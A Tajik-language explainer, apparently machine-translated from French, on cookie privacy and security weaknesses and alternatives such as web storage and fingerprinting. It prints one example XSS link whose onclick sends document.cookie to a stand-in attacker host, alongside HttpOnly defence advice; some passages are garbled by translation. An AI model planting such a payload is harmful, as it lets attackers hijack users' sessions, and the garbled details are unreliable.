Илова ба масъалаҳои махфият, кукиҳо инчунин баъзе камбудиҳои техникӣ доранд. Аз ҷумла, онҳо на ҳама вақт корбаронро дақиқ муайян мекунанд, онҳо метавонанд кори сайтро ҳангоми шумораи зиёд суст кунанд, онҳо метавонанд барои ҳамлаҳои амниятӣ истифода шаванд ва бо интиқоли намояндагии давлатӣ, услуби меъмории нармафзор мухолифат мекунанд.

Муайянкунии номуайян

Агар дар компютер зиёда аз як браузер истифода шавад, дар ҳар яки онҳо ҳамеша як воҳиди нигаҳдории алоҳида барои кукиҳо мавҷуд аст. Аз ин рӯ, кукиҳо шахсияти шахсро муайян намекунанд, балки маҷмӯи ҳисоби корбар, компютер ва браузери веб. Ҳамин тариқ, ҳар кас метавонад аз ин ҳисобҳо, компютерҳо ё браузерҳое истифода барад, ки дорои файлҳои кукиҳо мебошанд. Ба ҳамин монанд, кукиҳо байни корбарони сершуморе, ки як ҳисоби корбарӣ, компютер ва браузерро мубодила мекунанд, ба монанди "интернет-кафеҳо" ё ҳама ҷое, ки ба захираҳои компютерӣ дастрасии ройгон медиҳанд, фарқ намекунад.

Аммо дар амал ин изҳорот дар аксари мавридҳо дурӯғ мебарояд, зеро имрӯз як компютери "шахсӣ" (ё смартфон ё планшет, ки бадтар аст) асосан аз ҷониби як нафар истифода мешавад. тавассути ҳаҷми иттилооти ҷамъовардашуда ба ҳадафи фардӣ мерасанд, ҳатто агар шахс "махзӯя" муайян карда нашавад.

Дуздии кукиҳо

Куки метавонад аз ҷониби компютери дигари шабака дуздида шавад.

Ҳангоми кори муқаррарӣ, кукиҳо байни сервер (ё гурӯҳи серверҳо дар як домен) ва браузери компютери корбар баргардонида мешаванд. Азбаски кукиҳо метавонанд дорои маълумоти ҳассос бошанд (номи корбар, пароле, ки барои тасдиқи аутентификатсия истифода мешавад ва ғ.), арзишҳои онҳо набояд барои компютерҳои дигар дастрас бошанд. Дуздии кукиҳо як амали боздошти кукиҳо аз ҷониби шахси сеюми беиҷозат мебошад.

Кукиҳоро метавон тавассути як снайфери маҷмӯӣ дар ҳамлае, ки рабуда шудани сессия ном дорад, дуздид. Трафик дар шабака метавонад аз ҷониби компютерҳои ғайр аз компютерҳои ирсолкунанда ва қабулкунанда (махсусан дар фазои Wi-Fi-и рамзнашуда) боздошт ва хонда шавад. Ин трафик кукиҳоро дар бар мегирад, ки тавассути сеансҳо тавассути протоколи оддии HTTP фиристода мешаванд. Вақте ки трафики шабака рамзгузорӣ нашудааст, корбарони бадхоҳ метавонанд бо истифода аз "sniffers-packet" муоширати корбарони дигарро дар шабака бихонанд.

Ин мушкилотро тавассути рамзкунонии пайвастшавӣ байни компютери корбар ва сервер бо истифода аз протоколи HTTPS бартараф кардан мумкин аст. Сервер метавонад а парчами бехатар ҳангоми гузоштани куки; браузер онро танҳо тавассути хати бехатар, ба монанди пайвасти SSL мефиристад.

Бо вуҷуди ин, бисёре аз сайтҳо, гарчанде ки иртиботи шифршудаи HTTPS-ро барои тасдиқи корбар (яъне саҳифаи воридшавӣ) истифода мебаранд, баъдтар кукиҳои сессия ва дигар маълумотро ба тариқи муқаррарӣ тавассути пайвастҳои HTTP рамзнашуда мефиристанд. Ҳамин тариқ, ҳамлагарон метавонанд кукиҳои корбарони дигарро дастгир кунанд ва онҳоро дар сайтҳои мувофиқ муаррифӣ кунанд ё онҳоро дар ҳамлаҳои кукиҳо истифода баранд.

Скрипт дар сайт: кукие, ки бояд танҳо байни сервер ва муштарӣ иваз карда шавад, ба тарафи сеюм фиристода мешавад.

Роҳи дигари дуздидани кукиҳо ин скрипт сайтҳо ва худи браузер барои фиристодани кукиҳо ба серверҳои зараровар, ки ҳеҷ гоҳ онҳоро қабул намекунанд. Браузерҳои муосир имкон медиҳанд, ки қисмҳои дар ҷустуҷӯи код аз сервер иҷро карда шаванд. Агар кукиҳо дар давоми вақти корӣ дастрас шаванд, арзишҳои онҳо метавонанд дар баъзе шакл ба серверҳое ирсол карда шаванд, ки набояд ба онҳо дастрасӣ дошта бошанд. Рамзгузории кукиҳо пеш аз фиристодани онҳо тавассути шабака барои пешгирии ҳамла кӯмак намекунад.

Ин навъи скрипти дохили сомона маъмулан аз ҷониби ҳамлагарон дар сайтҳое истифода мешавад, ки ба корбарон имкон медиҳанд мундариҷаи HTML-ро интишор кунанд. Бо ворид кардани як қисми рамзи мувофиқ дар саҳми HTML, ҳамлакунанда метавонад кукиҳоро аз корбарони дигар қабул кунад. Донистани ин кукиҳо метавонад тавассути пайвастшавӣ ба як сайт бо истифода аз кукиҳои дуздидашуда истифода шавад ва ҳамин тавр ҳамчун корбаре эътироф карда шавад, ки кукиҳои ӯ дуздида шудааст.

Яке аз роҳҳои пешгирии чунин ҳамлаҳо истифодаи парчами HttpOnly мебошад; ин вариантест, ки аз версияи 6-и Internet Explorer дар PHP аз версияи 5.2.0 ҷорӣ шудааст, ки ба нақша гирифта шудааст, ки кукиро барои муштарӣ ба скрипт дастнорас созад. Аммо, таҳиягарони веб бояд дар таҳияи сайти худ инро ба назар гиранд, то онҳо аз скрипт дар сайт эмин бошанд.

Дигар таҳдиди амниятӣ, ки истифода мешавад, сохтакории талабот дар сайт мебошад.

Мушаххасоти техникии расмӣ имкон медиҳад, ки кукиҳо танҳо ба серверҳои домене, ки аз он сарчашма гирифтаанд, баргардонида шаванд. Аммо, арзиши кукиҳоро метавон ба серверҳои дигар бо истифода аз воситаҳои ғайр аз сарлавҳаҳои кукиҳо фиристод.

Аз ҷумла, ба забонҳои скрипт, ба монанди JavaScript, ба таври умум иҷозат дода мешавад, ки ба арзишҳои кукиҳо дастрасӣ пайдо кунанд ва қодиранд, ки арзишҳои худсаронаро ба ҳама гуна сервер дар Интернет фиристанд. Ин қобилияти скрипт аз вебсайтҳое истифода мешавад, ки ба корбарон имкон медиҳанд мундариҷаи HTML-ро барои дидани корбарони дигар интишор кунанд.

Масалан, ҳамлагаре, ки дар домени example.com амал мекунад, метавонад шарҳеро фиристад, ки дорои истиноди зерин аст, ки ба блоги маъмул ишора мекунад, ки дар акси ҳол онҳо назорат намекунанд:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Вақте ки корбари дигар ин истинодро клик мекунад, браузер қисми атрибутии onclick-ро иҷро мекунад, аз ин рӯ сатри document.cookie-ро бо рӯйхати кукиҳои корбар, ки барои ин саҳифа фаъоланд, иваз мекунад. Аз ин рӯ, ин рӯйхати кукиҳо ба сервери example.com фиристода мешавад ва аз ин рӯ, ҳамлакунанда метавонад кукиҳои ин корбарро ҷамъ кунад.

Муайян кардани ин навъи ҳамла аз ҷониби корбар душвор аст, зеро скрипт аз ҳамон домене меояд, ки кукиро муқаррар мекунад ва амалиёти фиристодани арзишҳо аз ҷониби он домен иҷозат дода мешавад. Гумон меравад, ки масъулияти маъмурони ин навъи сайтро ҷорӣ кардани маҳдудиятҳое, ки аз нашри коди зараровар пешгирӣ мекунанд, мебошад.

Кукиҳо мустақиман ба барномаҳои муштарӣ ба монанди JavaScript намоён нестанд, агар онҳо бо парчами HttpOnly фиристода шуда бошанд. Аз нуқтаи назари сервер, ягона фарқият дар он аст, ки дар хати сарлавҳаи Set-Cookie майдони нав илова карда шудааст, ки сатри HttpOnly дорад:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Вақте ки браузер чунин кукиро қабул мекунад, он бояд онро одатан дар мубодилаи HTTP-и зерин истифода барад, аммо бе он ки онро ба скриптҳои дар тарафи муштарӣ иҷрошаванда намоён накунад. Парчами HttpOnly ҷузъи ягон мушаххасоти техникии расмӣ нест ва дар ҳама браузерҳо татбиқ карда намешавад. Дар хотир доред, ки дар айни замон ҳеҷ гуна роҳе барои пешгирӣ кардани хондан ва навиштани кукиҳои сессия бо усули XMLHTTPRequest вуҷуд надорад.

Тағйир додани мундариҷа: ҳамлакунанда кукии беэътиборро ба сервер мефиристад, ки эҳтимолан аз кукии дурусти фиристодаи сервер сохта шудааст.

Тағир додани кукиҳо

Ҳамин ки кукиҳо бояд нигоҳ дошта шаванд ва бетағйир ба сервер баргардонида шаванд, ҳамлакунанда метавонад арзиши кукиҳоро пеш аз фиристодани онҳо ба сервер тағир диҳад. Масалан, агар куки дорои арзиши умумие бошад, ки корбар бояд барои ашёи дар аробаи мағоза ҷойгиршуда пардохт кунад, тағир додани ин арзиш серверро ба хатари ситонидани аз ҳамлагар аз нархи ибтидоӣ камтар мекунад. Раванди тағир додани арзиши кукиҳо номида мешавад заҳролудшавӣ аз куки ва метавонад пас аз дуздии кукиҳо барои доимӣ кардани ҳамла истифода шавад.

Дар усули бекоркунии кукиҳо, ҳамлакунанда хатогии браузерро барои фиристодани кукиҳои беэътибор ба сервер истифода мебарад.

Бо вуҷуди ин, аксари вебсайтҳо танҳо ID-и сессияро нигоҳ медоранд - рақами беназири ба таври тасодуфӣ тавлидшуда, ки барои муайян кардани корбари сессия истифода мешавад - дар худи кукиҳо, дар ҳоле ки ҳама маълумоти дигар дар сервер нигоҳ дошта мешаванд. Дар ин ҳолат, ин мушкилот асосан ҳал карда мешавад.

Коркарди кукиҳо байни вебсайтҳо

Интизор меравад, ки ҳар як сайт кукиҳои худро дошта бошад, аз ин рӯ як сайт наметавонад кукиҳои марбут ба сайти дигарро тағир диҳад ё эҷод кунад. Камбудии амнияти браузери веб метавонад ба сайтҳои зараровар имкон диҳад, ки ин қоидаро вайрон кунанд. Истифодаи чунин камбудӣ одатан номида мешавад пухтупаз дар байни сайтҳо. Ҳадафи чунин ҳамлаҳо метавонад дуздии ID сеанс бошад.

Истифодабарандагон бояд версияҳои охирини веб-браузерҳоро истифода баранд, ки дар онҳо ин осебҳо амалан бартараф карда мешаванд.

Ҳолати ихтилоф байни муштарӣ ва сервер

Истифодаи кукиҳо метавонад дар байни ҳолати муштарӣ ва ҳолати дар куки нигоҳ дошташуда ихтилоф эҷод кунад. Агар корбар кукиро ба даст орад ва тугмаи "Бозгашт"-и браузерро клик кунад, ҳолати браузер умуман мисли пеш аз ин харид нест. Масалан, агар сабади мағозаи онлайн бо истифода аз кукиҳо сохта шуда бошад, пас ҳангоми баргаштан ба таърихи браузер мундариҷаи сабад тағир дода наметавонад: агар корбар тугмаро пахш кунад, то мақоларо ба сабади худ илова кунад ва тугмаи "Бозгашт" -ро пахш кунад. " тугмаи, мақола дар ин мақола боқӣ мемонад. Ин метавонад нияти корбар набошад, ки албатта мехоҳад иловаи мақоларо бекор кунад. Ин метавонад ба беэътимод, нофаҳмиҳо ва хатогиҳо оварда расонад. Аз ин рӯ, таҳиягарони веб бояд аз ин мушкилот огоҳ бошанд ва барои ҳалли чунин ҳолатҳо чораҳо андешанд.

Мӯҳлати куки

Коршиносони амнияти махфият кукиҳои доимиро барои он танқид карданд, ки мӯҳлати эътибораш ба зудӣ ба охир нарасидааст ва ба ин васила ба вебсайтҳо имкон медиҳад, ки корбаронро пайгирӣ кунанд ва профили худро бо мурури замон созанд. Ин ҷанбаи кукиҳо инчунин як қисми мушкилоти рабудани сеанс аст, зеро кукии доимии дуздидашуда метавонад барои тақлид кардани корбар дар муддати тӯлонӣ истифода шавад.

Барои хондан: GAFAM: онҳо кистанд? Чаро онҳо (баъзан) ин қадар даҳшатноканд?

Алтернативаҳо ба кукиҳо

Баъзе амалиётҳоеро, ки бо истифода аз кукиҳо иҷро кардан мумкин аст, инчунин бо истифода аз механизмҳои дигаре иҷро кардан мумкин аст, ки кукиҳоро аз байн мебаранд ё кукиҳои ҳазфшударо аз нав эҷод мекунанд, ки дар муқоиса бо кукиҳо мушкилоти махфиятро ба ҳамон тарз (ё баъзан бадтар аз он сабаб ноаён) ба вуҷуд меорад.

Суроғаи IP

Истифодабарандагонро метавон бо суроғаи IP-и компютере, ки ба саҳифа занг мезанад, пайгирӣ кард. Ин усул аз замони ҷорӣ шудани шабакаи ҷаҳонии Интернет дастрас аст, зеро саҳифаҳо зеркашида мешаванд, сервер суроғаи IP-и компютереро, ки дар браузер ё прокси кор мекунад, дархост мекунад, агар ҳеҷ чиз истифода нашавад. Сервер метавонад ин маълумотро пайгирӣ кунад, новобаста аз он ки кукиҳо дар истифода ҳастанд ё не. Бо вуҷуди ин, ин суроғаҳо одатан дар муайян кардани корбар нисбат ба кукиҳо камтар эътимодноканд, зеро компютерҳо ва проксиҳо метавонанд аз ҷониби корбарони сершумор мубодила карда шаванд ва як компютер метавонад дар ҳар як сессияи корӣ суроғаи IP-и дигар гирад (масалан, c аксар вақт барои пайвастшавӣ ба телефон). .

Пайгирӣ аз рӯи суроғаҳои IP метавонад дар баъзе ҳолатҳо боэътимод бошад, ба монанди пайвастҳои фарохмаҷро, ки як суроғаи IP-ро барои муддати тӯлонӣ нигоҳ медоранд, то он даме, ки қувваи барқ ​​фаъол аст.

Баъзе системаҳо ба монанди Tor тарҳрезӣ шудаанд, ки махфияти Интернетро нигоҳ доранд ва пайгирӣ аз рӯи суроғаи IP-ро ғайриимкон ё ғайриимкон гардонанд.

URL

Техникаи дақиқтар ба ворид кардани маълумот дар URL асос ёфтааст. Қисми сатри дархости URL як техникаест, ки маъмулан барои ин мақсад истифода мешавад, аммо қисмҳои дигар низ метавонанд истифода шаванд. Ҳам серверлети Java ва ҳам механизмҳои сессияи PHP ин усулро истифода мебаранд, агар кукиҳо фаъол набошанд.

Ин усул сервери вебро дар бар мегирад, ки дархостҳои сатрро ба истинодҳои саҳифаи веб, ки ҳангоми фиристодани он ба браузер интиқол медиҳад, илова мекунад. Вақте ки корбар истинодро пайгирӣ мекунад, браузер сатри дархости замимашударо ба сервер бармегардонад.

Сатрҳои пурсишҳое, ки барои ин мақсад истифода мешаванд ва кукиҳо хеле шабоҳат доранд, ҳам ин маълумотест, ки аз ҷониби сервер худсарона интихоб карда мешавад ва аз ҷониби браузер баргардонида мешавад. Аммо, баъзе фарқиятҳо вуҷуд доранд: вақте ки URL-и дорои сатри дархост дубора истифода мешавад, ҳамон маълумот ба сервер фиристода мешавад. Масалан, агар афзалиятҳои корбар дар сатри дархости URL рамзгузорӣ шуда бошанд ва корбар он URL-ро ба корбари дигар тавассути почтаи электронӣ ирсол кунад, он корбар низ метавонад аз ин афзалиятҳо истифода кунад.

Аз тарафи дигар, вақте ки корбар ба як саҳифа ду маротиба ворид мешавад, ҳеҷ кафолате нест, ки як сатри дархост ҳарду дафъа истифода мешавад. Масалан, агар корбар бори аввал ба саҳифаи саҳифаи дохилии сайт ворид шавад ва бори дуюм ба ҳамон саҳифа аз саҳифаи беруна ворид шавад, сатри дархост нисбат ба саҳифаи сайт одатан фарқ мекунад, дар ҳоле ки кукиҳо якхелаанд. .

Дигар нуқсонҳои сатрҳои пурсиш бо амният алоқаманданд: нигоҳ доштани маълумоте, ки сеансро дар сатри дархост муайян мекунад, ҳамлаҳои сабти сеанс, ҳамлаҳои истинод ба идентификатор ва эксплойтҳои дигарро имкон медиҳад ё содда мекунад. Гузаронидани ID-ҳои сессия ҳамчун кукиҳои HTTP бехатартар аст.

Майдони шакли пинҳон

Як шакли пайгирии сессия, ки аз ҷониби ASP.NET истифода мешавад, истифодаи шаклҳои веб бо майдонҳои пинҳоншуда мебошад. Ин техника ба истифодаи сатри дархости URL барои интиқоли иттилоот хеле монанд аст ва дорои якхела бартарӣ ва нуқсонҳо мебошад; ва агар форма бо усули HTTP GET коркард шавад, майдонҳо воқеан қисми URL-и браузер мешаванд, ки ҳангоми пешниҳоди форма онро мефиристанд. Аммо аксари шаклҳо бо HTTP POST коркард мешаванд, ки ин боиси он мегардад, ки маълумоти форма, аз ҷумла майдонҳои пинҳон, ҳамчун вуруди иловагӣ илова карда шавад, ки на қисми URL ва на куки нест.

Ин равиш аз нуқтаи назари пайгирӣ ду бартарият дорад: аввал, пайгирии иттилооте, ки дар коди сарчашмаи HTML ҷойгир шудааст ва вуруди POST ба ҷои URL ба корбари оддӣ имкон медиҳад, ки аз ин пайгирӣ канорагирӣ кунад; дуюм, маълумоти сессия ҳангоми нусхабардории URL (барои захира кардани саҳифа ба диск ё фиристодани он тавассути почтаи электронӣ, масалан) нусхабардорӣ карда намешавад.

window.name

Ҳама веб-браузерҳои маъмул метавонанд миқдори хеле зиёди маълумотро (2МБ то 32МБ) тавассути JavaScript бо истифода аз амволи window.name DOM нигоҳ доранд. Ин маълумот метавонад ба ҷои кукиҳои сессия истифода шавад ва инчунин дар саросари доменҳо истифода мешавад. Техникаро бо объектҳои JSON пайваст кардан мумкин аст, то маҷмӯи мураккаби тағирёбандаҳои сеанси муштарӣ нигоҳ дошта шавад.

Камбуди дар он аст, ки ҳар як равзанаи алоҳида ё ҷадвали аввал дорои як window.name холӣ мешавад; ҳангоми азназаргузаронӣ аз рӯи ҷадвалҳо (корбар кушода мешавад) ин маънои онро дорад, ки ҷадвалҳои алоҳида кушодашуда номи равзана надоранд. Илова бар ин, window.name метавонад барои пайгирии меҳмонон дар сайтҳои гуногун истифода шавад, ки метавонад мушкилоти махфият дошта бошад.

Аз баъзе ҷиҳатҳо, ин метавонад аз кукиҳо бехатартар бошад, зеро он ба сабаби ҷалб нашудани сервер ба ҳамлаи шабакавии кукиҳои sniffer осебпазир аст. Аммо, агар барои ҳифзи додаҳо чораҳои махсус андешида шаванд, он ба ҳамлаҳои минбаъда осебпазир аст, зеро маълумот тавассути сайтҳои дигаре, ки дар ҳамон равзана кушода мешаванд, дастрас аст.

тасдиқи HTTP

Протоколи HTTP протоколҳои асосии аутентификатсияи дастрасӣ ва дайджести аутентификатсияи дастрасиро дар бар мегирад, ки дастрасӣ ба саҳифаи вебро танҳо ҳангоми додани номи корбар ва парол иҷозат медиҳад. Агар сервер сертификат талаб кунад, ки дастрасӣ ба саҳифаи вебро диҳад, браузер онро аз корбар талаб мекунад ва пас аз гирифтани он, браузер онро нигоҳ медорад ва дар ҳама дархостҳои минбаъдаи HTTP мефиристад. Ин маълумот метавонад барои пайгирии корбар истифода шавад.

Объекти муштараки маҳаллӣ

Агар браузер дорои плагини Adobe Flash Player бошад, объектҳои муштараки маҳаллӣ метавонад бо ҳамон як мақсад ҳамчун кукиҳо истифода шавад. Онҳо метавонанд барои таҳиягарони веб интихоби ҷолиб бошанд, зеро:

• маҳдудияти андозаи пешфарз барои объекти муштараки маҳаллӣ 100 KB аст;
• чекҳои амниятӣ аз чекҳои кукиҳои корбар ҷудо мебошанд (аз ин рӯ, объектҳои муштараки маҳаллӣ метавонанд ҳангоми мавҷуд набудани кукиҳо иҷозат дода шаванд).

Ин нуқтаи охирин, ки сиёсати идоракунии кукиҳоро аз объектҳои муштараки маҳаллии Adobe фарқ мекунад саволхо ба миён мегузорад дар бораи идоракунии корбар танзимоти махфияти худ: ӯ бояд донист, ки идоракунии кукиҳои ӯ ба идоракунии объектҳои муштараки маҳаллӣ таъсир намерасонад ва баръакс.

Интиқоди дигари ин система ин аст, ки онро танҳо тавассути плагини Adobe Flash Player истифода бурдан мумкин аст, ки моликият аст, на стандарти веб.

Устуворӣ аз ҷониби муштарӣ

Баъзе веб-браузерҳо механизми устувории скриптро дастгирӣ мекунанд, ки ба саҳифа имкон медиҳад, ки маълумотро барои истифодаи баъдӣ ба таври маҳаллӣ нигоҳ доранд. Масалан, Internet Explorer маълумоти доимиро дар таърихи браузер, хатчӯбҳо, дар формати дар XML нигоҳ дошташуда ё бевосита бо саҳифаи веб, ки дар диск захира шудааст, дастгирӣ мекунад. Барои Microsoft Internet Explorer 5, усули корбар-маълумот тавассути рафтори DHTML мавҷуд аст.

W3C дар HTML 5 API-и нави JavaScript-ро барои нигаҳдории додаҳои муштарӣ муаррифӣ кард, ки он нигаҳдории веб номида мешавад ва ҳадафи он ба таври доимӣ иваз кардани кукиҳо буд. Он ба кукиҳо монанд аст, аммо дорои қобилияти хеле беҳтаршуда ва бидуни нигоҳ доштани маълумот дар сарлавҳаи дархостҳои HTTP мебошад. API ду намуди нигаҳдории вебро иҷозат медиҳад: нигаҳдории маҳаллӣ ва нигоҳдории сеанс, ки ба кукиҳои доимӣ ва кукиҳои сессия монанд аст (ба истиснои он, ки кукиҳои сессия ҳангоми баста шудани браузер ба охир мерасанд. нигоҳдории сессия мутаносибан ҳангоми баста шудани ҷадвал ба охир мерасад. Нигоҳдории веб аз ҷониби Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 ва Opera 10.50 дастгирӣ карда мешавад.

Механизми дигар одатан ба кэшкунии браузер (на дар хотира, на аз навсозӣ) бо истифода аз барномаҳои JavaScript дар саҳифаҳои веб такя мекунад. 

Масалан, саҳифа метавонад барчаспро дар бар гирад . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Дар ин лаҳза, барнома дар хотираи кэш боқӣ мемонад ва саҳифаи боздидшуда бори дуюм бор карда намешавад. Аз ин рӯ, агар барнома дорои як тағирёбандаи глобалӣ бошад (масалан var id = 3243242;), ин идентификатор эътиборнок боқӣ мемонад ва пас аз бори дигар бор кардани саҳифа ё боре, ки саҳифае, ки барномаро мепайвандад, онро дигар коди JavaScript истифода бурдан мумкин аст. 

Камбудии асосии ин усул дар он аст, ки тағирёбандаи глобалии JavaScript бояд статикӣ бошад, яъне онро мисли куки тағир додан ё нест кардан мумкин нест.

изи ангуштони браузери веб

Изи ангуштони браузер ин маълумотест, ки дар бораи танзимоти конфигуратсияи браузер бо мақсади муайянкунӣ ҷамъоварӣ мешавад. Ин изи ангуштҳо метавонанд барои пурра ё қисман муайян кардани корбари интернет ё дастгоҳ ҳатто ҳангоми хомӯш кардани кукиҳо истифода шаванд.

Маълумоти асосии конфигуратсияи браузери веб муддати тӯлонӣ аз ҷониби хидматрасонии аудиторияи вебсайт бо мақсади дақиқ чен кардани трафики интернетии одамон ва ошкор кардани шаклҳои гуногуни қаллобии клик ҷамъоварӣ карда шудааст. Бо ёрии забонҳои скрипт аз ҷониби муштарӣ, ҷамъоварии иттилоот хеле дақиқтар аст акнун имконпазир.

Табдил додани ин маълумот ба сатри каме изи ангушти дастгоҳро ба вуҷуд меорад. Соли 2010 Бунёди электронии сарҳадӣ (EFF) энтропияи изи ангушти браузерро ҳадди аққал чен кард. Лаҷом 18,1, ва ин пеш аз пешрафтҳо дар изи ангуштон ба ин энтропия 5,7 бит илова карда буд.

Кукиҳо дар кӯтоҳ

Кукиҳо файлҳои хурди матнӣ мебошанд, ки тавассути браузери веб дар диски сахти меҳмони вебсайт нигоҳ дошта мешаванд ва (аз ҷумла чизҳои дигар) барои сабти маълумот дар бораи меҳмон ё сафари онҳо тавассути сайт истифода мешаванд. Ҳамин тариқ, вебмастер метавонад одатҳои меҳмонро эътироф кунад ва муаррифии сайти худро барои ҳар як меҳмон фардӣ кунад; пас кукиҳо имкон медиҳанд, ки дар саҳифаи хонагӣ чанд мақола намоиш дода шавад ё ҳатто маълумотномаҳои воридшавӣ барои ягон шахси хусусӣ нигоҳ дошта шавад: вақте ки меҳмон ба сайт бармегардад, дигар лозим нест, ки ном ва пароли худро дар саҳифаи худ ворид кунад. эътироф карда шаванд, зеро онҳо ба таври худкор дар куки хонда мешаванд.

Куки мӯҳлати маҳдуд дорад, ки онро тарроҳи сайт муқаррар кардааст. Онҳо инчунин метавонанд дар охири иҷлосия дар сайт ба охир расад, ки ба бастани браузер мувофиқат мекунад. Кукиҳо ба таври васеъ истифода мешаванд, то ҳаёти меҳмононро осонтар кунанд ва ба онҳо маълумоти бештар мувофиқро пешкаш кунанд. Аммо усулҳои махсус имкон медиҳанд, ки як меҳмонро дар якчанд сайтҳо пайгирӣ кунед ва ба ин васила дар бораи одатҳои ӯ маълумоти хеле васеъ ҷамъоварӣ ва тафтиш кунед. Ин усул ба истифодаи кукиҳо ҳамчун як техникаи назоратӣ, ки махфияти меҳмононро вайрон мекунад, шӯҳрат дод, ки мутаассифона дар бисёр ҳолатҳо истифода бо сабабҳои ғайритехникӣ ё эҳтиром ба интизориҳои корбарон ба воқеият мувофиқат мекунад. .

Дар посух ба ин тарсҳои қонунӣ, HTML 5 API-и нави JavaScript-ро барои нигаҳдории додаҳои муштарӣ бо номи нигаҳдории веб муаррифӣ мекунад, ки хеле амнтар ва дорои иқтидори бештар аст, ки ҳадафи он иваз кардани кукиҳо мебошад.

Нигоҳдории кукиҳо

Бо баъзе браузерҳо, кукиро ба осонӣ таҳрир кардан мумкин аст, муҳаррири оддии матн ба монанди Notepad барои ба таври дастӣ тағир додани арзишҳои он кифоя аст.

Кукиҳо вобаста ба браузер ба таври гуногун захира карда мешаванд:

• Microsoft Internet Explorer ҳар як кукиро дар файли дигар захира мекунад;
• Mozilla Firefox ҳамаи кукиҳои худро дар як файл захира мекунад;
• Опера тамоми кукиҳои худро дар як файл нигоҳ медорад ва онҳоро рамзгузорӣ мекунад (тағйир додани онҳо ба ҷуз аз имконоти нармафзор имконнопазир аст);
• Apple Safari ҳамаи кукиҳои худро дар як файли васеъшавии .plist захира мекунад. Тағирот имконпазир аст, аммо он қадар осон нест, агар шумо аз имконоти нармафзор гузаред.

Браузерҳо бояд дастгирӣ кунанд минимум :

• 300 кукиҳои ҳамзамон;
• 4 o барои як куки;
• 20 кукиҳо барои як мизбон ё домен.